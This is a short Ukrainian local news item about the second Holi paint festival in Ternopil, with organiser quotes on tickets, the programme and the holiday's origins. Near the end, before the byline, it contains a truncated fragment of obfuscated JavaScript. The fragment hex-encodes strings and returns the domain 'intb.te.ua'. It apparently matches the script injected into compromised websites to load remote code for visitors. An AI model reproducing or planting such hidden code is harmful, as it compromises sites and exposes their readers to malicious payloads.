Ви знаходитесь: Головна / Новини / В Тернополі знову битимуться фарбами

В Тернополі знову битимуться фарбами

В Тернополі знову битимуться фарбами. Вдруге в нашому місті відбудеться фестиваль фарб «Holi Fest». Містян запрошують приходити в гарному настрої і в одязі, який не страшно зіпсувати.

Минулого року у святкуванні «Holi Fest» взяли участь близько восьми сотень людей. 45 кілограмів спеціальної фарби тоді розмели за лічені секунди. Цього року організатори готові і до більшої кількості учасників, запевняють, фарби вистачить.

ОКСАНА МАЛАНЧУК, член ГО «Файне місто»

«Флаєри на фарбу можна придбати вже зараз, в нас вконтакті є група «Ternopil Holi Fest 2016». Там є інформація, контактні номери за якими можна зателефонувати і придбати флаєри. В нас передбачена програма на 2-3 годинки. В нас буде діджей, ведучий, музика, конкурси всякі, розіграші і буде передбачено три хвилі кидання фарб. Перша зокрема буде патріотична, тобто, перша хвиля буде синьо-жовта фарба».

Фестиваль Холі – давнє індійське свято.  Колись вважали, що обсипання фарбою принесе щастя. А чим більше фарби на одязі, тим більш успішною буде людина.

ОКСАНА МАЛАНЧУК, член ГО «Файне місто»

«В Індії його святкують на початку весни і, так би мовити, таке обкидання фарбами є символом початку весни і очищення від чогось, можна сказати, нечистого. В Україні холіфест зазвичай в більшості містах завжди проводиться влітку».

Цьогоріч Holi Fest у Тернополі відбудеться у рамках «Галицької Дефіляди», а саме – 18 червня о 16:00 на острівку «Чайка».

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top